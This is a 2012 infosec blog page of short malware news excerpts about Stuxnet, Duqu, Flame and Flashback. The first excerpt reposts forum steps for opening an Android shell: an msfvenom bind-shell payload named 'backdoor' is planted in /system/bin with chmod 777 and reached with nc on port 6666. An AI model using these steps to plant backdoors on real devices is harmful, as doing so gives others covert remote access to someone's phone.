Pages Menu
TwitterRssFacebook
Categories Menu

Posted by on Oct 5, 2012 in Infosec, Malware | 0 comments

A simple android shell with Metasploit

A simple android shell with Metasploit

_anUBiS a respected member of the corrupt a computer security forum has posted method to open a android shell with metasploit framework. The steps given by him are as follows, 1) Create ARM executable msfvenom -p linux/armle/shell_bind_tcp -f elf LPORT=6666 > /tmp/backdoor 2) Mount your android /system/bin dir for r/wI used “Root Explorer” app for this. There are other ways to do it. 3) Copy /tmp/backdoor (from Backtrack) to /system/bin/backdoor (your phone) and chmod 777 4) Run ‘backdoor’ on your phone. (Use a terminal emulator, or find any other way  ) 5) Connect to phone nc your.phone.ip.address 6666 6) When connection is established, set PATH variable PATH=/system/bin He further says it still needs root permission plant this, and shell does not listen persistently, so when we disconnect,  the file must be run again on the phone. Source :...

Read More

Posted by on Jun 9, 2012 in Infosec, Malware | 0 comments

Operation: Olympic Games, the secrets behind the worlds first sophisticated cyber attack malware – Stuxnet

Operation: Olympic Games, the secrets behind the worlds first sophisticated cyber attack malware – Stuxnet

Iran’s president ahmadinejad looking at the centrifuges World’s first sophisticated cyber attack malware – Stuxnet was the weapon of the operation – Olympic Games says The NewYork Times in an article published earlier this week. The detailed article says, A cyberwar against Iran’s nuclear enrichment program was launched during Bush administration and it was it was accelerated by Obama administration. The operation was called ‘Olympic Games’. Stuxnet was the weapon of the Olympic Games, jointly developed by NSA (National Security Agency) of America and Israel’s Unit 8200 (part of Israel’s military technical intelligence unit). Israel had cooperated with United States in this operation disabling Iran’s nuclear enrichment program by sabotaging thousands of Centrifuges in the Nantz underground Nuclear plant in Iran. The Stuxnet malware were intended to infect only the computers connected with the centrifuges but went wild due to the error in the program in one of the updates which followed the initial version. It seems initially the malware were introduced to the computers in the Nantz plant by...

Read More

Posted by on Jun 6, 2012 in Infosec, Malware | 0 comments

Techs ask for Stuxnet-Duqu-Flame code, say that is opensource !!

Techs ask for Stuxnet-Duqu-Flame code, say that is opensource !!

Duqu Framework Techs from CrySyS an information security blog says that the latest series of state sponsored cyber attack malware uses open source libraries. The malware uses a number of libraries to perform number of activities associated with its purpose like compress files, connect to remote servers, store information in  databases. Based on the information collected from these malware like Stuxnet, Duqu and Flame the guys at crysys have reported few libraries which are supposedly used in their codes.Duqu: modified LZO for .zdata: LZO and the LZO algorithms and implementations are distributed under the terms if the GNU General Public License (GPL). Flame: putty – MIT licenselibbz2 – BSD-style licensezlib – very permissive license http://www.gzip.org/zlib/zlib_license.htmlSQLite – public domainLua – MIT license On a lighter note, they say since the malware uses open-source code they should give the codes of these malware too !! source :...

Read More

Posted by on May 30, 2012 in Infosec, Malware | 0 comments

Iran develops tools to defend against Flame malware

Iran develops tools to defend against Flame malware

The sophistication of Flame malware made ithard for the security software to detect it.  Iran has developed tools that can help it defend against the latest malware known as Flame to hit it’s infrastructure. Iran has been hit by sophisticated malware for past few years targeted on its  nuclear infrastructure. The latest on that series of malware after Stuxnet, Duqu is the Flame. Flame seem to infiltrate the networks and steal sensitive data. Flame tried to circumvent the security software scanning by disguising itself as a genuine computer file. Flame was first discovered after the UN’s International Telecommunications Union asked for help from security firms to find out what was wiping data from machines across the middle East. Judging from the  sophistication of the malware, it seem to have originated from a state sponsored cyber attack on Iran like before. But unlike previous attacks Flame malware seem to have affected only few hundred computers. Iran’s National Computer Emergency Response Team (Maher) said in a statement that the detection and clean-up tool was finished in...

Read More

Posted by on Apr 13, 2012 in Infosec, Malware | 0 comments

Apple releases security update to fix Flashback malware

Apple releases security update to fix Flashback malware

Apple has released the much need security update to fix Flashback Malware Apple today has released the security update for Java to fix the infamous Flashback malware, which has affected over 1 Million  OSX running computers over past months. This security update claims to remove known traces of Flashback malware and to disable automatic execution of Java applets. It was using the java applets the Flashback malware tricked the users to believe they were updating the Adobe Flash player in their...

Read More

Posted by on Mar 9, 2012 in Infosec, Malware | 0 comments

Duqu aka Stuxnet 2.0 Trojan has unkown programming language!! Kaspersky asks help of programmers

Duqu aka Stuxnet 2.0 Trojan has unkown programming language!! Kaspersky asks help of programmers

This code which is the payload seems to have been coded using unknown programming language According to kaspersky, which is analysing the malware Duqu also known as Stuxnet 2.0 by some the payload DLL, which communicates with the Command and Control (C&C) server seems to have been written using some  coding language never seen before.                                                                     Some parts of it, including those for downloading and executing additional modules were written in standard c++ but a big chunk of it was not. This particular section contains no references to any standard or user written c++ functions, and may have been created by different programming team. Kaspersky says many parts of Duqu are directly borrowed from Stuxnet, but this one is new. The company has named it Duqu Framework and has noted that it is not written i C++, Objective C, Java,...

Read More